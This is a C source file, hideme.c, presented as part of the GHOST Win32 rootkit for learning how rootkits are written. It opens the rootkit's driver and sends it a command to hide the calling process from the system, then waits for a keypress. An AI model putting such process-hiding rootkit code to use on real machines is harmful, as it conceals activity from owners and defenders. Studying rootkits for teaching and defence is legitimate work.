📄 hideme.c

📁 Source code for a Win32 rootkit named GHOST; a good introductory resource for learning how rootkits are written.
💻 C
// HideMe
// Copyright Ric Vieler, 2006
// Send a hide command to MyDeviceDriver
// and wait for operator to stop the process
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include "IoManager.h"

int main(int argc, char *argv[])
{
	HANDLE deviceHandle;
	GHOST_IOCTLDATA control = { 0 };
	ULONG status = 0; // receives the byte count returned by DeviceIoControl

	deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if( deviceHandle == INVALID_HANDLE_VALUE )
	{
		printf ("Could not find MyDeviceDriver.\n");
	}
	else
	{  
		control.processId = GetCurrentProcessId();

		if( DeviceIoControl(	deviceHandle,
			GHOST_HIDE_COMMAND,
			&control,
			sizeof(control), // input
			(PVOID)&control,
			sizeof(control), // output
			&status,
			NULL ) )
			printf ("MyDeviceDriver hiding this process (0x%x).\n",
				control.processId );
		else
			printf ("DeviceIoControl failed.\n");

		CloseHandle(deviceHandle);
	}
	
	printf ("Press any key to terminate this process..." );
	_getch(); // ISO-conformant name for getch() in <conio.h>
	printf ("\n" );
}
